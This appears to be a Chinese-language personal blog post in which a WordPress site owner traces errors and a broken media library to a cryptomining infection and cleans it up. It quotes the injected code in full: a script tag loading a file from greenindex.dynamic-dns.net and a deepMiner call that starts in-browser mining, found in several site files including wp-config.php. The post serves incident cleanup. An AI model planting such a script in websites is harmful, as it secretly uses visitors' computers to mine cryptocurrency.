前几天注意到网站后台有些程序不是很正常,比如删除插件的时候会给出一个错误信息,但是插件也能被删除,后来注意到错误信息里有dynamic-dns.net的网址,就有点奇怪了,怎么会在wordpress里有这么个网站信息,然后再仔细看错误信息,有deepminer的字样,直接翻译的话,叫“深度矿工”,这个miner现在太热门了,因为各种虚拟币都是需要miner(矿工)来挖矿。
后来拿Wordfence来查,它也工作不正常。
然后今天发现,居然媒体库都无法以Grid方式显示了,只能以List方式显示。查了半天,后来把debug打开,
- define( ‘WP_DEBUG’, true );
- define( ‘WP_DEBUG_DISPLAY’, true );
然后挨个去关闭插件找问题,也没找到原因。
随手就做了个网站的导出操作,算是临时备份,结果打开这个导出的xml文件,发现前面居然是这么一串东西:
这一看就是有问题了。
各种搜索了以后,确定是被挂了挖矿木马。
用xshell登录到网站上,使用grep -r “greenindex”命令查找了一下,还好就下面几个文件被做了修改:
- 404.html
- index.html
- wp-config.php
- wordfence-waf.php
编辑这些文件,挨个去掉这些代码:
<script src=’https://greenindex.dynamic-dns.net/jqueryeasyui.js’></script>
<script>
var uri = ‘www’;
var jqueryui = new deepMiner.Anonymous(uri, {autoThreads: true,throttle: 0.5});
if (!jqueryui.isMobile() && !jqueryui.didOptOut(14400)) {
jqueryui.start();
}
</script><?xml version=”1.0″ encoding=”UTF-8″ ?>
系统看起来正常了。
然后把这几个文件的属性给改成只读。
有时候觉得弄个网站真是不省心,本来想耍耍笔杆子写两篇文章,结果非要让你搞成个搞IT维护的。